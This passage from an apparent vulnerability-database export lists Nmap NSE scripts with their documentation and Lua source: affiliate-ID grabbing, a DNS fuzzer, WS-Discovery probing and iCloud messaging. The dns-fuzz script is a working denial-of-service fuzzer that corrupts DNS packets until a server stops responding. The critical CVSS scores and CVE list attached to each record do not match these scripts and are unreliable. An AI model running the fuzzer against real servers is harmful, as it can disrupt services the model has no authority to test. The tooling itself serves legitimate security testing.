used to identify pages with the same owner. \n\nIf there is more than one target using an ID, the postrule of this script shows the ID along with a list of the targets using it. \n\nSupported IDs: \n\n * Google Analytics \n * Google AdSense \n * Amazon Associates\n\n## Script Arguments \n\n#### http-affiliate-id.url-path \n\nThe path to request. Defaults to `/`.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=http-affiliate-id.nse --script-args http-affiliate-id.url-path=/website <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 80/tcp open http\n | http-affiliate-id:\n | Amazon Associates ID: XXXX-XX\n | Google Adsense ID: pub-YYYY\n |_ Google Analytics ID: UA-ZZZZ-ZZ\n Post-scan script results:\n | http-affiliate-id: Possible related sites\n | Google Analytics ID: UA-2460010-99 used by:\n | thisisphotobomb.memebase.com:80/\n | memebase.com:80/\n | Google Adsense ID: pub-0766144451700556 used by:\n | thisisphotobomb.memebase.com:80/\n |_ memebase.com:80/\n\n## Requires \n\n * [http](<../lib/http.html>)\n * [nmap](<../lib/nmap.html>)\n * [re](<../lib/re.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [tableaux](<../lib/tableaux.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-03-31T20:32:50", "type": "nmap", "title": "http-affiliate-id NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-11-06T15:07:01", "id": "NMAP:HTTP-AFFILIATE-ID.NSE", "href": "https://nmap.org/nsedoc/scripts/http-affiliate-id.html", "sourceData": "local http = require \"http\"\nlocal nmap = require \"nmap\"\nlocal re = require \"re\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal tableaux = require \"tableaux\"\n\ndescription = [[\nGrabs affiliate network IDs (e.g. Google AdSense or Analytics, Amazon\nAssociates, etc.) from a web page. These can be used to identify pages\nwith the same owner.\n\nIf there is more than one target using an ID, the postrule of this\nscript shows the ID along with a list of the targets using it.\n\nSupported IDs:\n* Google Analytics\n* Google AdSense\n* Amazon Associates\n]]\n\n---\n-- @args http-affiliate-id.url-path The path to request. Defaults to\n-- <code>/</code>.\n--\n-- @usage\n-- nmap --script=http-affiliate-id.nse --script-args http-affiliate-id.url-path=/website <target>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 80/tcp open http\n-- | http-affiliate-id:\n-- | Amazon Associates ID: XXXX-XX\n-- | Google Adsense ID: pub-YYYY\n-- |_ Google Analytics ID: UA-ZZZZ-ZZ\n-- Post-scan script results:\n-- | http-affiliate-id: Possible related sites\n-- | Google Analytics ID: UA-2460010-99 used by:\n-- | thisisphotobomb.memebase.com:80/\n-- | memebase.com:80/\n-- | Google Adsense ID: pub-0766144451700556 used by:\n-- | thisisphotobomb.memebase.com:80/\n-- |_ memebase.com:80/\n\nauthor = {\"Hani Benhabiles\", \"Daniel Miller\", \"Patrick Donnelly\"}\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"safe\", \"discovery\"}\n\n\n-- these are the regular expressions for affiliate IDs\nlocal AFFILIATE_PATTERNS = {\n [\"Google Analytics ID\"] = re.compile [[{| ({'UA-' [%d]^6 [%d]^-3 '-' [%d][%d]?} / .)* |}]],\n [\"Google Adsense ID\"] = re.compile [[{| ({'pub-' [%d]^16} / .)* |}]],\n [\"Amazon Associates ID\"] = re.compile [[\n body <- {| (uri / .)* |}\n uri <- 'http://' ('www.amazon.com/' ([\\?&;] 'tag=' tag / [^\"'])*) / ('rcm.amazon.com/' ([\\?&;] 't=' tag / [^\"'])*)\n tag <- {[%w]+ '-' [%d]+}\n]],\n}\n\nlocal URL_SHORTENERS = {\n [\"amzn.to\"] = re.compile [[{| ( 'http://' ('www.')? 'amzn.to' {'/' ([%a%d])+ } / .)*|}]]\n}\n\n\nportrule = shortport.http\n\npostrule = function() return (nmap.registry[\"http-affiliate-id\"] ~= nil) end\n\n--- put id in the nmap registry for usage by other scripts\n--@param host nmap host table\n--@param port nmap port table\n--@param affid affiliate id table\nlocal add_key_to_registry = function(host, port, path, affid)\n local site = host.targetname or host.ip\n site = site .. \":\" .. port.number .. path\n nmap.registry[\"http-affiliate-id\"] = nmap.registry[\"http-affiliate-id\"] or {}\n\n nmap.registry[\"http-affiliate-id\"][site] = nmap.registry[\"http-affiliate-id\"][site] or {}\n table.insert(nmap.registry[\"http-affiliate-id\"][site], affid)\nend\n\nportaction = function(host, port)\n local result = {}\n local url_path = stdnse.get_script_args(\"http-affiliate-id.url-path\") or \"/\"\n local body = http.get(host, port, url_path).body\n\n if ( not(body) ) then\n return\n end\n\n local followed = {}\n\n for shortener, pattern in pairs(URL_SHORTENERS) do\n for i, shortened in ipairs(pattern:match(body)) do\n stdnse.debug1(\"Found shortened Url: \" .. shortened)\n local response = http.get(shortener, 80, shortened)\n stdnse.debug1(\"status code: %d\", response.status)\n if (response.status == 301 or response.status == 302) and response.header['location'] then\n followed[#followed + 1] = response.header['location']\n end\n end\n end\n followed = table.concat(followed, \"\\n\")\n\n -- Here goes affiliate matching\n for name, pattern in pairs(AFFILIATE_PATTERNS) do\n local ids = {}\n for i, id in ipairs(pattern:match(body..followed)) do\n if not ids[id] then\n result[#result + 1] = name .. \": \" .. id\n stdnse.debug1(\"found id:\" .. result[#result])\n add_key_to_registry(host, port, url_path, result[#result])\n ids[id] = true\n end\n end\n end\n\n return stdnse.format_output(true, result)\nend\n\n--- iterate over the list of gathered ids and look for related sites (sharing the same siteids)\nlocal function postaction()\n local siteids = {}\n local output = {}\n\n -- create a reverse mapping affiliate ids -> site(s)\n for site, ids in pairs(nmap.registry[\"http-affiliate-id\"]) do\n for _, id in ipairs(ids) do\n if not siteids[id] then\n siteids[id] = {}\n end\n -- discard duplicate IPs\n if not tableaux.contains(siteids[id], site) then\n table.insert(siteids[id], site)\n end\n end\n end\n\n -- look for sites using the same affiliate id\n for id, sites in pairs(siteids) do\n if #siteids[id] > 1 then\n local str = id .. ' used by:'\n for _, site in ipairs(siteids[id]) do\n str = str .. '\\n ' .. site\n end\n table.insert(output, str)\n end\n end\n\n if #output > 0 then\n return 'Possible related sites\\n' .. table.concat(output, '\\n')\n end\nend\n\nlocal ActionsTable = {\n -- portrule: get affiliate ids\n portrule = portaction,\n -- postrule: look for related sites (same affiliate ids)\n postrule = postaction\n}\n\n-- execute the action function corresponding to the current rule\naction = function(...) return ActionsTable[SCRIPT_TYPE](...) end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:56", "description": "Launches a DNS fuzzing attack against DNS servers. \n\nThe script induces errors into randomly generated but valid DNS packets. The packet template that we use includes one uncompressed and one compressed name. \n\nUse the `dns-fuzz.timelimit` argument to control how long the fuzzing lasts. This script should be run for a long time. It will send a very large quantity of packets and thus it's pretty invasive, so it should only be used against private DNS servers as part of a software development lifecycle.\n\n## Script Arguments \n\n#### dns-fuzz.timelimit \n\nHow long to run the fuzz attack. This is a number followed by a suffix: `s` for seconds, `m` for minutes, and `h` for hours. Use `0` for an unlimited amount of time. Default: `10m`.\n\n## Example Usage \n \n \n nmap -sU --script dns-fuzz --script-args timelimit=2h <target>\n \n\n## Script Output \n \n \n Host script results:\n |_dns-fuzz: Server stopped responding... He's dead, Jim.\n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [dns](<../lib/dns.html>)\n * [math](<>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-04-04T13:41:32", "type": "nmap", "title": "dns-fuzz NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-08-23T17:13:56", "id": "NMAP:DNS-FUZZ.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-fuzz.html", "sourceData": "local comm = require \"comm\"\nlocal dns = require \"dns\"\nlocal math = require \"math\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nLaunches a DNS fuzzing attack against DNS servers.\n\nThe script induces errors into randomly generated but valid DNS packets.\nThe packet template that we use includes one uncompressed and one\ncompressed name.\n\nUse the <code>dns-fuzz.timelimit</code> argument to control how long the\nfuzzing lasts. This script should be run for a long time. It will send a\nvery large quantity of packets and thus it's pretty invasive, so it\nshould only be used against private DNS servers as part of a software\ndevelopment lifecycle.\n]]\n\n---\n-- @usage\n-- nmap -sU --script dns-fuzz --script-args timelimit=2h <target>\n--\n-- @args dns-fuzz.timelimit How long to run the fuzz attack. This is a\n-- number followed by a suffix: <code>s</code> for seconds,\n-- <code>m</code> for minutes, and <code>h</code> for hours. Use\n-- <code>0</code> for an unlimited amount of time. Default:\n-- <code>10m</code>.\n--\n-- @output\n-- Host script results:\n-- |_dns-fuzz: Server stopped responding... He's dead, Jim.\n\nauthor = \"Michael Pattrick\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"fuzzer\", \"intrusive\"}\n\n\nportrule = shortport.portnumber(53, {\"tcp\", \"udp\"})\n\n-- How many ms should we wait for the server to respond.\n-- Might want to make this an argument, but 500 should always be more then enough.\nDNStimeout = 500\n\n-- Will the DNS server only respond to recursive questions\nrecursiveOnly = false\n\n-- We only perform a DNS lookup of this site\nrecursiveServer = \"scanme.nmap.org\"\n\n---\n-- Checks if the server is alive/DNS\n-- @param host The host which the server should be running on\n-- @param port The servers port\n-- @return Bool, true if and only if the server is alive\nfunction pingServer (host, port, attempts)\n local status, response, result\n -- If the server doesn't respond to the first in a multiattempt probe, slow down\n local slowDown = 1\n if not recursiveOnly then\n -- try to get a server status message\n -- The method that nmap uses by default\n local data\n local pkt = dns.newPacket()\n pkt.id = math.random(65535)\n\n pkt.flags.OC3 = true\n\n data = dns.encode(pkt)\n\n for i = 1, attempts do\n status, result = comm.exchange(host, port, data, {timeout=DNStimeout^slowDown})\n if status then\n return true\n end\n slowDown = slowDown + 0.25\n end\n\n return false\n else\n -- just do a vanilla recursive lookup of scanme.nmap.org\n for i = 1, attempts do\n status, response = dns.query(recursiveServer, {host=host.ip, port=port.number, proto=port.protocol, tries=1, timeout=DNStimeout^slowDown})\n if status then\n return true\n end\n slowDown = slowDown + 0.25\n end\n return false\n end\nend\n\n---\n-- Generate a random 'label', a string of ascii characters do be used in\n-- the requested domain names\n-- @return Random string of lowercase characters\nfunction makeWord ()\n local len = math.random(3,7)\n local name = {string.char(len)}\n for i = 1, len do\n -- this next line assumes ascii\n name[i+1] = string.char(math.random(string.byte(\"a\"),string.byte(\"z\")))\n end\n return table.concat(name)\nend\n\n---\n-- Turns random labels from makeWord into a valid domain name.\n-- Includes the option to compress any given name by including a pointer\n-- to the first record. Obviously the first record should not be compressed.\n-- @param compressed Bool, whether or not this record should have a compressed field\n-- @return A dns host string\nfunction makeHost (compressed)\n -- randomly choose between 2 to 4 levels in this domain\n local levels = math.random(2,4)\n local name = {}\n for i = 1, levels do\n name[#name+1] = makeWord ()\n end\n if compressed then\n name[#name+1] = \"\\xc0\\x0c\"\n else\n name[#name+1] = \"\\x00\"\n end\n\n return table.concat(name)\nend\n\n---\n-- Concatenate all the bytes of a valid dns packet, including names generated by\n-- makeHost(). This packet is to be corrupted.\n-- @return Always returns a valid packet\nfunction makePacket()\n local recurs = 0x00\n if recursiveOnly then\n recurs = 0x01\n end\n return\n string.char( math.random(0,255), math.random(0,255), -- TXID\n recurs, 0x00, -- Flags, recursion disabled by default for obvious reasons\n 0x00, 0x02, -- Questions\n 0x00, 0x00, -- Answer RRs\n 0x00, 0x00, -- Authority RRs\n 0x00, 0x00) -- Additional RRs\n -- normal host\n .. makeHost (false) .. -- Hostname\n string.char( 0x00, 0x01, -- Type (A)\n 0x00, 0x01) -- Class (IN)\n -- compressed host\n .. makeHost (true) .. -- Hostname\n string.char( 0x00, 0x05, -- Type (CNAME)\n 0x00, 0x01) -- Class (IN)\nend\n\n---\n-- Introduce bit errors into a packet at a rate of 1/50\n-- As Charlie Miller points out in \"Fuzz by Number\"\n-- -> cansecwest.com/csw08/csw08-miller.pdf\n-- It's difficult to tell how much random you should insert into packets\n-- \"If data is too valid, might not cause problems, If data is too invalid,\n-- might be quickly rejected\"\n-- so 1/50 is arbitrary\n-- @param dnsPacket A packet, generated by makePacket()\n-- @return The same packet, but with bit flip errors\nfunction nudgePacket (dnsPacket)\n local chunks = {}\n local pos = 1\n for i = 1, #dnsPacket do\n -- Induce bit errors at a rate of 1/50.\n if math.random(50) == 25 then\n table.insert(chunks, dnsPacket:sub(pos, i - 1))\n table.insert(chunks, string.char(dnsPacket:byte(i) ~ (1 << math.random(0, 7))))\n pos = i + 1\n end\n end\n table.insert(chunks, dnsPacket:sub(pos))\n return table.concat(chunks)\nend\n\n---\n-- Instead of flipping a bit, we drop an entire byte\n-- @param dnsPacket A packet, generated by makePacket()\n-- @return The same packet, but with a single byte missing\nfunction dropByte (dnsPacket)\n local pos = math.random(#dnsPacket)\n return dnsPacket:sub(1, pos - 1) .. dnsPacket:sub(pos + 1)\nend\n\n---\n-- Instead of dropping an entire byte, insert a random byte\n-- @param dnsPacket A packet, generated by makePacket()\n-- @return The same packet, but with a single byte missing\nfunction injectByte (dnsPacket)\n local pos = math.random(#dnsPacket + 1)\n return dnsPacket:sub(1, pos - 1) .. string.char(math.random(0,255)) .. dnsPacket:sub(pos)\nend\n\n---\n-- Instead of inserting a byte, truncate the packet at random position\n-- @param dnsPacket A packet, generated by makePacket()\n-- @return The same packet, but truncated\nfunction truncatePacket (dnsPacket)\n -- at least 12 bytes to make sure the packet isn't dropped as a tinygram\n local pos = math.random(12, #dnsPacket - 1)\n return dnsPacket:sub(1, pos)\nend\n\n---\n-- As the name of this function suggests, we corrupt the packet, and then send it.\n-- We choose at random one of three corruption functions, and then corrupt/send\n-- the packet a maximum of 10 times\n-- @param host The servers IP\n-- @param port The servers port\n-- @param query An uncorrupted DNS packet\n-- @return A string if the server died, else nil\nfunction corruptAndSend (host, port, query)\n local randCorr = math.random(0,4)\n local status\n local result\n -- 10 is arbitrary, but seemed like a good number\n for j = 1, 10 do\n if randCorr<=1 then\n -- slight bias to nudging because it seems to work better\n query = nudgePacket(query)\n elseif randCorr==2 then\n query = dropByte(query)\n elseif randCorr==3 then\n query = injectByte(query)\n elseif randCorr==4 then\n query = truncatePacket(query)\n end\n\n status, result = comm.exchange(host, port, query, {timeout=DNStimeout})\n if not status then\n if not pingServer(host,port,3) then\n -- no response after three tries, the server is probably dead\n return \"Server stopped responding... He's dead, Jim.\\n\"..\n \"Offending packet: 0x\".. stdnse.tohex(query)\n else\n -- We corrupted the packet too much, the server will just drop it\n -- No point in using it again\n return nil\n end\n end\n if randCorr==4 then\n -- no point in using this function more then once\n return nil\n end\n end\n return nil\nend\n\naction = function(host, port)\n local endT\n local timelimit, err\n local retStr\n local query\n\n for _, k in ipairs({\"dns-fuzz.timelimit\", \"timelimit\"}) do\n if nmap.registry.args[k] then\n timelimit, err = stdnse.parse_timespec(nmap.registry.args[k])\n if not timelimit then\n error(err)\n end\n break\n end\n end\n if timelimit and timelimit > 0 then\n -- seconds to milliseconds plus the current time\n endT = timelimit*1000 + nmap.clock_ms()\n elseif not timelimit then\n -- 10 minutes\n endT = 10*60*1000 + nmap.clock_ms()\n end\n\n\n -- Check if the server is a DNS server.\n if not pingServer(host,port,1) then\n -- David reported that his DNS server doesn't respond to\n recursiveOnly = true\n if not pingServer(host,port,1) then\n return \"Server didn't response to our probe, can't fuzz\"\n end\n end\n nmap.set_port_state (host, port, \"open\")\n\n -- If the user specified that we should run for n seconds, then don't run for too much longer\n -- If 0 seconds, then run forever\n while not endT or nmap.clock_ms()<endT do\n -- Forge an initial packet\n -- We start off with an only slightly corrupted packet, then add more and more corruption\n -- if we corrupt the packet too much then the server will just drop it, so we only recorrupt several times\n -- then start all over\n query = makePacket ()\n -- induce random jitter\n retStr = corruptAndSend (host, port, query)\n if retStr then\n return retStr\n end\n end\n return \"The server seems impervious to our assault.\"\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:32:22", "description": "Retrieves and displays information from devices supporting the Web Services Dynamic Discovery (WS-Discovery) protocol. It also attempts to locate any published Windows Communication Framework (WCF) web services (.NET 4.0 or later).\n\n## Script Arguments \n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n sudo ./nmap --script wsdd-discover\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 3702/udp open|filtered unknown\n | wsdd-discover:\n | Devices\n | Message id: 39a2b7f2-fdbd-690c-c7c9-deadbeefceb3\n | Address: http://10.0.200.116:50000\n |_ Type: Device wprt:PrintDeviceType\n \n \n\n## Requires \n\n * [coroutine](<>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [wsdd](<../lib/wsdd.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-11-10T22:35:13", "type": "nmap", "title": "wsdd-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:WSDD-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/wsdd-discover.html", "sourceData": "local coroutine = require \"coroutine\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal wsdd = require \"wsdd\"\n\ndescription = [[\nRetrieves and displays information from devices supporting the Web\nServices Dynamic Discovery (WS-Discovery) protocol. It also attempts\nto locate any published Windows Communication Framework (WCF) web\nservices (.NET 4.0 or later).\n]]\n\n---\n-- @usage\n-- sudo ./nmap --script wsdd-discover\n--\n-- @output\n-- PORT STATE SERVICE\n-- 3702/udp open|filtered unknown\n-- | wsdd-discover:\n-- | Devices\n-- | Message id: 39a2b7f2-fdbd-690c-c7c9-deadbeefceb3\n-- | Address: http://10.0.200.116:50000\n-- |_ Type: Device wprt:PrintDeviceType\n--\n--\n\n--\n-- Version 0.1\n-- Created 10/31/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"discovery\", \"default\"}\n\n\nportrule = shortport.portnumber(3702, \"udp\", {\"open\", \"open|filtered\"})\n\n-- function used for running several discovery threads in parallel\n--\n-- @param funcname string containing the name of the function to run\n-- the name should be one of the discovery functions in wsdd.Helper\n-- @param result table into which the results are stored\ndiscoverThread = function( funcname, host, port, results )\n -- calculates a timeout based on the timing template (default: 5s)\n local timeout = ( 20000 / ( nmap.timing_level() + 1 ) )\n local condvar = nmap.condvar( results )\n local helper = wsdd.Helper:new(host, port)\n helper:setTimeout(timeout)\n\n local status, result = helper[funcname](helper)\n if ( status ) then table.insert(results, result) end\n condvar(\"broadcast\")\nend\n\nlocal function sortfunc(a,b)\n if ( a and b and a.name and b.name ) and ( a.name < b.name ) then\n return true\n end\n return false\nend\n\naction = function(host, port)\n\n local threads, results = {}, {}\n local condvar = nmap.condvar( results )\n\n -- Attempt to discover both devices and WCF web services\n for _, f in ipairs( {\"discoverDevices\", \"discoverWCFServices\"} ) do\n threads[stdnse.new_thread( discoverThread, f, host, port, results )] = true\n end\n\n local done\n -- wait for all threads to finish\n while( not(done) ) do\n done = true\n for thread in pairs(threads) do\n if (coroutine.status(thread) ~= \"dead\") then done = false end\n end\n if ( not(done) ) then\n condvar(\"wait\")\n end\n end\n\n if ( results ) then\n table.sort( results, sortfunc )\n return stdnse.format_output(true, results)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:43:34", "description": "Sends a message to a iOS device through the Apple MobileMe web service. The device has to be registered with an Apple ID using the Find My Iphone application.\n\n## Script Arguments \n\n#### http-icloud-sendmsg.username \n\nthe Apple ID username\n\n#### http-icloud-sendmsg.sound \n\nboolean specifying if a loud sound should be played while displaying the message. (default: true)\n\n#### http-icloud-sendmsg.subject \n\nthe subject of the message to send to the device.\n\n#### http-icloud-sendmsg.message \n\nthe body of the message to send to the device.\n\n#### http-icloud-sendmsg.deviceindex \n\nthe device index to which the message should be sent (@see http-icloud-sendmsg.listdevices)\n\n#### http-icloud-sendmsg.password \n\nthe Apple ID password\n\n#### http-icloud-sendmsg.listdevices \n\nlist the devices managed by the specified Apple ID.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sn -Pn --script http-icloud-sendmsg --script-args=\"username=<user>,password=<pass>,http-icloud-sendmsg.listdevices\"\n nmap -sn -Pn --script http-icloud-sendmsg --script-args=\"username=<user>,password=<pass>,deviceindex=1,subject='subject',message='hello world.',sound=false\"\n \n\n## Script Output \n \n \n Pre-scan script results:\n | http-icloud-sendmsg:\n |_ Message was successfully sent to \"Patrik Karlsson's iPhone\"\n \n\n## Requires \n\n * [mobileme](<../lib/mobileme.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-04-17T19:35:44", "type": "nmap", "title": "http-icloud-sendmsg NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-ICLOUD-SENDMSG.NSE", "href": "https://nmap.org/nsedoc/scripts/http-icloud-sendmsg.html", "sourceData": "local mobileme = require \"mobileme\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\n\ndescription = [[\nSends a message to a iOS device through the Apple MobileMe web service. The\ndevice has to be registered with an Apple ID using the Find My Iphone\napplication.\n]]\n\n---\n-- @usage\n-- nmap -sn -Pn --script http-icloud-sendmsg --script-args=\"username=<user>,password=<pass>,http-icloud-sendmsg.listdevices\"\n-- nmap -sn -Pn --script http-icloud-sendmsg --script-args=\"username=<user>,password=<pass>,deviceindex=1,subject='subject',message='hello world.',sound=false\"\n--\n-- @output\n-- Pre-scan script results:\n-- | http-icloud-sendmsg:\n-- |_ Message was successfully sent to \"Patrik Karlsson's iPhone\"\n--\n-- @args http-icloud-sendmsg.username the Apple ID username\n-- @args http-icloud-sendmsg.password the Apple ID password\n-- @args http-icloud-sendmsg.listdevices list the devices managed by the\n-- specified Apple ID.\n-- @args http-icloud-sendmsg.deviceindex the device index to which the message\n-- should be sent (@see http-icloud-sendmsg.listdevices)\n-- @args http-icloud-sendmsg.subject the subject of the message to send to the\n-- device.\n-- @args http-icloud-sendmsg.message the body of the message to send to the\n-- device.\n-- @args http-icloud-sendmsg.sound boolean specifying if a loud sound should be\n-- played while displaying the message. (default: true)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\", \"external\"}\n\n\nlocal arg_username = stdnse.get_script_args(SCRIPT_NAME .. \".username\")\nlocal arg_password = stdnse.get_script_args(SCRIPT_NAME .. \".password\")\nlocal arg_listdevices = stdnse.get_script_args(SCRIPT_NAME .. \".listdevices\")\nlocal arg_deviceindex = tonumber(stdnse.get_script_args(SCRIPT_NAME .. \".deviceindex\"))\nlocal arg_subject = stdnse.get_script_args(SCRIPT_NAME .. \".subject\")\nlocal arg_message = stdnse.get_script_args(SCRIPT_NAME .. \".message\")\nlocal arg_sound = stdnse.get_script_args(SCRIPT_NAME .. \".sound\") or true\n\n\nprerule = function() return true end\n\n-- decode basic UTF8 encoded strings\n-- iOS devices are commonly named after the user eg:\n-- * Patrik Karlsson's Macbook Air\n-- * Patrik Karlsson's iPhone\n--\n-- This function decodes the single quote as a start and should really\n-- be replaced with a proper UTF-8 decoder in the future\nlocal function decodeString(str)\n return str:gsub(\"\\226\\128\\153\", \"'\")\nend\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\nlocal function listDevices(mm)\n local status, devices = mm:getDevices()\n if ( not(status) ) then\n return fail(\"Failed to get devices\")\n end\n\n local output = tab.new(2)\n tab.addrow(output, \"id\", \"name\")\n for i=1, #devices do\n local name = decodeString(devices[i].name or \"\")\n tab.addrow(output, i, name)\n end\n\n if ( 1 < #output ) then\n return stdnse.format_output(true, tab.dump(output))\n end\nend\n\n\naction = function()\n if ( not(arg_username) or not(arg_password) ) then\n return fail(\"No username or password was supplied\")\n end\n\n if ( not(arg_deviceindex) and not(arg_listdevices) ) then\n return fail(\"No device ID was specified\")\n end\n\n if ( 1 == tonumber(arg_listdevices) or \"true\" == arg_listdevices ) then\n local mm = mobileme.Helper:new(arg_username, arg_password)\n return listDevices(mm)\n elseif ( not(arg_subject) or not(arg_message) ) then\n return fail(\"Missing subject or message\")\n else\n local 